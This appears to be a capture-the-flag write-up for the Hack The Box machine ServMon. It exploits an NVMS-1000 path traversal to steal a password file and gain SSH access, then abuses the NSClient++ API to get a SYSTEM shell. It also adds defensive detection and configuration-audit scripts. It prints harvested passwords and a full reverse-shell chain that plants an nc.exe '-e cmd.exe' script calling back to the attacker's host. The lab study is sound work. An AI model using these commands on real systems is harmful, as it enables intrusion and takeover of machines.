
Hack The Box Write-Up ServMon - 10.10.10.184

Monitoring is not protection.

Myself

About ServMon

In this post, I’m writing a write-up for the machine ServMon from Hack The Box. Hack The Box is an online platform to train your ethical hacking and penetration testing skills.

ServMon is an ‘Easy’ rated box. Submitting the user.txt flag raises your points by 10 and submitting the root flag raises them by 20.

Foothold

After the port scan, I found some interesting open ports, like 21/tcp (FTP), 80/tcp (HTTP) and 8443/tcp (alt-HTTPS). Anonymous FTP login is allowed and through FTP I found in the folder of Nathan a txt-file with the message that there is a passwords.txt file placed on his Desktop. Then, I checked the service on the HTTP port and it seems that the NVMS-1000 software has a Path Traversal vulnerability.

User

Through the Path Traversal vulnerability, I was able to read the passwords.txt file from the Desktop of Nathan and establish an SSH connection with the user account of Nadine and grab the user flag.

Root

I checked the 8443/tcp port and found that the software NSClient++ is running on this box. After checking the version of NSClient++ I found that there is a known vulnerability for this particular version. Through the API I was able to put a revshell.bat in the scripts folder and execute this file. The reverse shell was established with Local System privileges.

Machine Info

[Image: ServMon machine info]

[Image: ServMon machine IP and creators]

Recon

Port scan with Nmap

As always we start with a port scan with Nmap.

nmap -sC -sV -oA ./nmap/servmon.txt 10.10.10.184

The results of the port scan.

Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-11 15:14 EDT
Nmap scan report for 10.10.10.184
Host is up (0.063s latency).
Not shown: 991 closed ports
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
| ftp-syst:
|_  SYST: Windows_NT
22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
|   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
|   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
|_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
80/tcp   open  http
| fingerprint-strings:
|   GetRequest, HTTPOptions, RTSPRequest:
|     HTTP/1.1 200 OK
|     Content-type: text/html
|     Content-Length: 340
|     Connection: close
|     AuthInfo:
|     <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
|     <html xmlns="http://www.w3.org/1999/xhtml">
|     <head>
|     <title></title>
|     <script type="text/javascript">
|     window.location.href = "Pages/login.htm";
|     </script>
|     </head>
|     <body>
|     </body>
|     </html>
|   NULL:
|     HTTP/1.1 408 Request Timeout
|     Content-type: text/html
|     Content-Length: 0
|     Connection: close
|_    AuthInfo:
|_http-title: Site doesn't have a title (text/html).
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
5666/tcp open  tcpwrapped
6699/tcp open  napster?
8443/tcp open  ssl/https-alt
| fingerprint-strings:
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest:
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.html
|     workers
|_    jobs
| http-title: NSClient++
|_Requested resource was /index.html
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port80-TCP:V=7.80%I=7%D=4/11%Time=5E921736%P=x86_64-pc-linux-gnu%r(NULL
SF:,6B,"HTTP/1\.1\x20408\x20Request\x20Timeout\r\nContent-type:\x20text/ht
SF:ml\r\nContent-Length:\x200\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n
SF:\r\n")%r(GetRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20tex
SF:t/html\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x
SF:20\r\n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20X
SF:HTML\x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/D
SF:TD/xhtml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.
SF:org/1999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\
SF:x20\x20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20
SF:\x20\x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x2
SF:0\x20\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")
SF:%r(HTTPOptions,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/htm
SF:l\r\nContent-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\
SF:n\r\n\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\
SF:x201\.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xh
SF:tml1-transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1
SF:999/xhtml\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x
SF:20\x20<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\
SF:x20\x20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20
SF:\x20\x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n")%r(RT
SF:SPRequest,1B4,"HTTP/1\.1\x20200\x20OK\r\nContent-type:\x20text/html\r\n
SF:Content-Length:\x20340\r\nConnection:\x20close\r\nAuthInfo:\x20\r\n\r\n
SF:\xef\xbb\xbf<!DOCTYPE\x20html\x20PUBLIC\x20\"-//W3C//DTD\x20XHTML\x201\
SF:.0\x20Transitional//EN\"\x20\"http://www\.w3\.org/TR/xhtml1/DTD/xhtml1-
SF:transitional\.dtd\">\r\n\r\n<html\x20xmlns=\"http://www\.w3\.org/1999/x
SF:html\">\r\n<head>\r\n\x20\x20\x20\x20<title></title>\r\n\x20\x20\x20\x2
SF:0<script\x20type=\"text/javascript\">\r\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20window\.location\.href\x20=\x20\"Pages/login\.htm\";\r\n\x20\x20\x20\
SF:x20</script>\r\n</head>\r\n<body>\r\n</body>\r\n</html>\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8443-TCP:V=7.80%T=SSL%I=7%D=4/11%Time=5E92173E%P=x86_64-pc-linux-gn
SF:u%r(GetRequest,74,"HTTP/1\.1\x20302\r\nContent-Length:\x200\r\nLocation
SF::\x20/index\.html\r\n\r\n\0\0\0\0\0\0\0\0\0\0t\0t\0\0\0\0\0\0\0\0\0\0\0
SF:\0\0\0\0\0\x12\x02\x18\0\x1aC\n\x07workers\x12\n\n\x04jobs\x12\x02\x18\
SF:x02\x12\x0f")%r(HTTPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\x20
SF:18\r\n\r\nDocument\x20not\x20found")%r(FourOhFourRequest,36,"HTTP/1\.1\
SF:x20404\r\nContent-Length:\x2018\r\n\r\nDocument\x20not\x20found")%r(RTS
SF:PRequest,36,"HTTP/1\.1\x20404\r\nContent-Length:\x2018\r\n\r\nDocument\
SF:x20not\x20found")%r(SIPOptions,36,"HTTP/1\.1\x20404\r\nContent-Length:\
SF:x2018\r\n\r\nDocument\x20not\x20found");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 2m29s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-04-11T19:19:20
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 154.74 seconds

There are some interesting ports open:

  1. 21/tcp (FTP)
  2. 22/tcp (SSH)
  3. 80/tcp (HTTP)
  4. 8443/tcp (alternative HTTPS)

FTP Anonymous login

Let’s go for the low-hanging fruit first. Anonymous FTP access is allowed, so let’s check that first and log in directly as anonymous with the default password anonymous.

~ftp 10.10.10.184
Connected to 10.10.10.184.
220 Microsoft FTP Service
Name (10.10.10.184:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp>

Let’s poke around.

ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:05PM       <DIR>          Users
226 Transfer complete.
ftp> cd users
250 CWD command successful.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
01-18-20  12:06PM       <DIR>          Nadine
01-18-20  12:08PM       <DIR>          Nathan
226 Transfer complete.

I got two user folders, Nadine and Nathan. From the Nadine directory I downloaded a file called Confidential.txt and from Nathan’s folder I downloaded the file Notes to do.txt.

Confidential.txt
This file contains a note to Nathan saying that a Passwords.txt file was left on his Desktop. Furthermore, the note points to some secure folder.

Nathan,

I left your Passwords.txt file on your Desktop.  Please remove this once you have edited it yourself and place it back into the secure folder.

Regards


Notes to do.txt
This is Nathan’s unfinished to-do list.

1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint

There are no more files for now, so let’s check the other open ports.

NVMS-1000

The next port in the enumeration phase is the HTTP port. I visited the webpage http://10.10.10.184. I landed on a login page of NVMS-1000. This web server is hosting Network Surveillance Management Software. NVMS-1000 is a monitoring client that is specially designed for network video surveillance.

Maybe I have already found the name of this box: ServMon, Server Monitoring?

[Image: NVMS-1000 login page on port 80]

I tried some default username and password combinations, but they did not work. After searching around on the internet I found that a specific version of NVMS-1000 is vulnerable to directory traversal according to this article: https://www.exploit-db.com/exploits/47774. CVE-2019-20085 was assigned to this vulnerability.

I checked this with Burp Suite and found that this NVMS-1000 is vulnerable to a directory traversal attack. I tried to read /windows/win.ini; every time the GET failed I added an extra /../.

[Image: NVMS-1000 directory traversal request in Burp Suite]
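From the defender's side, the probing described above (stacking /../ until the GET succeeds) leaves a recognisable trail in the web server's access log. The following Python detector is an added example, not part of the original write-up: it normalises each requested path (repeated percent-decoding to catch double encoding, backslashes treated as slashes) and flags any request that would climb above the web root, including the failed 404 probes. The log lines are constructed samples; 10.10.14.42 is the attacker address used elsewhere in this write-up.

```python
import re
from urllib.parse import unquote

# Minimal Common Log Format: client, request line (method, path), status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample log lines (not taken from the box).
SAMPLE_LOG = """\
10.10.14.42 - - [11/Apr/2020:15:20:01 -0400] "GET /Pages/login.htm HTTP/1.1" 200
10.10.14.42 - - [11/Apr/2020:15:21:10 -0400] "GET /../windows/win.ini HTTP/1.1" 404
10.10.14.42 - - [11/Apr/2020:15:21:12 -0400] "GET /../../../../../../windows/win.ini HTTP/1.1" 200
10.10.14.42 - - [11/Apr/2020:15:21:30 -0400] "GET /%2e%2e/%2e%2e/windows/win.ini HTTP/1.1" 200
10.10.14.42 - - [11/Apr/2020:15:21:31 -0400] "GET /%252e%252e/%252e%252e/windows/win.ini HTTP/1.1" 200
10.10.14.42 - - [11/Apr/2020:15:21:40 -0400] "GET /..\\..\\Users\\Nathan\\Desktop\\Passwords.txt HTTP/1.1" 200
10.10.14.42 - - [11/Apr/2020:15:22:00 -0400] "GET /images/a..b/logo.png HTTP/1.1" 200
"""


def normalise_path(raw: str) -> str:
    """Percent-decode repeatedly (bounded, so double encoding such as %252e
    is caught) and turn backslashes into forward slashes so Windows-style
    traversal is judged the same way as /../."""
    path = raw
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")


def escapes_root(path: str) -> bool:
    """Walk the path segment by segment; a '..' that would take the depth
    below zero means the request tries to leave the web root."""
    depth = 0
    for segment in path.split("/"):
        if segment in ("", "."):
            continue
        if segment == "..":
            depth -= 1
            if depth < 0:
                return True
        else:
            depth += 1
    return False


def find_traversal(log_text: str) -> list:
    """Return one record per request whose path escapes the web root.
    The status code is recorded but not used for the decision: failed (404)
    probes are attempts too, and are what an alert should catch before the
    attacker finds the depth that works."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, method, raw_path, status = m.groups()
        if escapes_root(normalise_path(raw_path)):
            hits.append({"client": client, "method": method,
                         "path": raw_path, "status": int(status)})
    return hits


if __name__ == "__main__":
    for hit in find_traversal(SAMPLE_LOG):
        print(f"{hit['client']} {hit['method']} {hit['path']} -> {hit['status']}")
```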

Ok, now I need to put the pieces together.

Intrusion

SSH shell as Nadine

I know there is a file called passwords.txt on Nathan’s Desktop. As NVMS-1000 has a path traversal vulnerability, I can fetch that file and grab the passwords.

[Image: NVMS-1000 path traversal request retrieving Passwords.txt]

I now have a list of passwords. I placed all of them in a file called passwords.txt.

1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$

As the SSH port is open I tried first to get an SSH shell as the user Nathan but the passwords are not working for his account. Then I’ve switched to the user account Nadine and managed to get a shell with the password L1k3B1gBut7s@W0rk.

I grab the user flag and can move on to the next step: privilege escalation.

~$ ssh nadine@10.10.10.184
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>cd Desktop

nadine@SERVMON C:\Users\Nadine\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 728C-D22C

 Directory of C:\Users\Nadine\Desktop

08/04/2020  22:28    <DIR>          .
08/04/2020  22:28    <DIR>          ..
15/04/2020  20:51                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)  27,418,095,616 bytes free

nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
7f26c77e1ccd17cede33c1b950c26e4e

nadine@SERVMON C:\Users\Nadine\Desktop>

Privilege Escalation

Enumeration

There is a non-default port open on this box: 8443/tcp (alt-https). When I visited https://10.10.10.184:8443 I landed on the Sign In page of NSClient++. I tried to log in with the passwords I already know, but none of them work; every attempt results in a “403 Your not allowed” notification.

[Image: NSClient++ sign-in page on port 8443]

I already have an active SSH session as Nadine. Let’s find out which version of NSClient++ this box is running, and I also need to find the password. On the NSClient++ documentation website (https://docs.nsclient.org/) I found how to grab the web administrator password.

nadine@SERVMON C:\Users\Nadine>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Users\Nadine> cd 'C:\Program Files\NSClient++\'
PS C:\Program Files\NSClient++> .\nscp.exe web password --display
Current password: ew2x6SsGTxjRwXOT

So, the password is ew2x6SsGTxjRwXOT. With the command below I can check the current installed version of NSClient++.

PS C:\Program Files\NSClient++> .\nscp.exe --version
NSClient++, Version: 0.5.2.35 2018-01-28, Platform: x64

I know that this box is running NSClient++, and I know the password and the version of the software. This has to be the way to root this box. With searchsploit I checked whether there is a known vulnerability for this version of NSClient++, and that seems to be the case.

~$ searchsploit nsclient++
------------------------------------------------ ----------------------------------
 Exploit Title                                  |  Path
                                                | (/usr/share/exploitdb/)
------------------------------------------------ ----------------------------------
NSClient++ 0.5.2.35 - Privilege Escalation      | exploits/windows/local/46802.txt
------------------------------------------------ ----------------------------------
Shellcodes: No Result

On this webpage of exploit-db: https://www.exploit-db.com/exploits/46802 there is an explanation about how to get a reverse shell with Local System privileges.

Exploitation

NSClient++

I found out there are two ways to root this box:

  1. Through the GUI
  2. or through the API

I’m new to APIs and want to learn something, so I chose the API route, which in my opinion is also the easiest way to root this box. I checked the NSClient++ API documentation for the commands. I started by removing the curl alias in PowerShell, because there it refers to the Invoke-WebRequest cmdlet, which I do not want to use.

PS C:\Program Files\NSClient++> Remove-Item alias:curl

First, I checked whether I can call the API through Nadine’s SSH session. It worked.

PS C:\Users\Nadine> curl -k -u admin https://localhost:8443/api/v1
Enter host password for user 'admin':
{"info_url":"https://localhost:8443/api/v1/info","logs_url":"https://localhost:8443/api/v1/logs","modules_url":"https://localhost:8443/api/v1/modules","queries_url":"https://localhost:8443/api/v1/queries","scripts_url":"https://localhost:8443/api/v1/scripts"}

As CheckExternalScripts and Scheduler are enabled already, I only have to place the script in the C:\Program Files\NSClient++\Scripts directory through the API and run this script. I invoked the command below and placed a reverse shell script, named revshell.bat. Of course, I placed the nc.exe file in the C:\Temp directory.

curl -s -k -u admin -X PUT https://127.0.0.1:8443/api/v1/scripts/ext/scripts/revshell.bat --data-binary "C:\Temp\nc.exe 10.10.14.42 4444 -e cmd.exe"

With this command I execute the script.

curl -s -k -u admin https://127.0.0.1:8443/api/v1/queries/revshell/commands/execute?time=3m
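The two API calls above only work because the web API and the CheckExternalScripts module are enabled together and the password is recoverable by a local user. The Python audit below is an added example (not from the write-up or from NSClient++) that checks an nsclient.ini for that combination. Section and key names ([/modules], [/settings/default] "allowed hosts" and "password") are taken from the NSClient++ documentation; both ini texts are constructed samples with a placeholder password. The weak sample restricts allowed hosts to 127.0.0.1, which is my inference for why the page shows a 403 remotely but a working API from localhost; the audit still flags it, because that restriction does not stop a local user who reads the password with nscp.exe.

```python
import configparser

# Constructed samples in the layout of nsclient.ini (key names per the
# NSClient++ docs; values illustrative, password is a placeholder).
WEAK_INI = """\
[/modules]
CheckExternalScripts = enabled
Scheduler = enabled
WEBServer = enabled

[/settings/default]
allowed hosts = 127.0.0.1
password = <PLACEHOLDER-WEB-PASSWORD>

[/settings/WEB/server]
port = 8443s
"""

# Same box with CheckExternalScripts switched off: the API can no longer
# create or run scripts, so a recovered password is no longer SYSTEM.
HARDENED_INI = """\
[/modules]
CheckExternalScripts = disabled
Scheduler = enabled
WEBServer = enabled

[/settings/default]
allowed hosts = 127.0.0.1
password = <PLACEHOLDER-WEB-PASSWORD>

[/settings/WEB/server]
port = 8443s
"""

TRUTHY = {"enabled", "1", "true", "yes"}


def load_ini(text: str) -> configparser.ConfigParser:
    cp = configparser.ConfigParser(interpolation=None, delimiters=("=",),
                                   comment_prefixes=(";", "#"))
    cp.optionxform = str  # keep key case: module names are CamelCase
    cp.read_string(text)
    return cp


def module_enabled(cp: configparser.ConfigParser, name: str) -> bool:
    return cp.get("/modules", name, fallback="disabled").strip().lower() in TRUTHY


def audit(cp: configparser.ConfigParser) -> list:
    """Return human-readable findings for the settings that make the
    NSClient++ privilege escalation shown above possible."""
    findings = []
    web = module_enabled(cp, "WEBServer")
    ext = module_enabled(cp, "CheckExternalScripts")
    hosts = cp.get("/settings/default", "allowed hosts", fallback="").strip()
    password = cp.get("/settings/default", "password", fallback="").strip()

    if web and ext:
        findings.append(
            "WEBServer and CheckExternalScripts both enabled: the REST API can "
            "create external scripts and run them as the service account "
            "(NT AUTHORITY\\SYSTEM); 'allowed hosts' does not protect against "
            "a local user who can recover the password with nscp.exe")
    if web and not password:
        findings.append("WEBServer enabled without a password")
    if web and (not hosts or hosts in ("*", "0.0.0.0/0")):
        findings.append("allowed hosts is unrestricted: any source can reach the API")
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(label, audit(load_ini(text)) or ["no findings"])
```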

The reverse shell is established and I can now grab the root flag.

~$ nc -lvp 4444
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.10.10.184.
Ncat: Connection from 10.10.10.184:50184.
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Program Files\NSClient++>whoami
whoami
nt authority\system

C:\Program Files\NSClient++>type "C:\Users\Administrator\Desktop\root.txt"
type "C:\Users\Administrator\Desktop\root.txt"
d3d0930a47b35c8ae6ff3689411bf7ad

C:\Program Files\NSClient++>

Thanks for reading this write-up! Did you enjoy reading it, or learn something from it? Please consider spending a respect point: https://app.hackthebox.com/profile/224856. Thanks!

Happy Hacking :-)

This post is licensed under CC BY 4.0 by the author.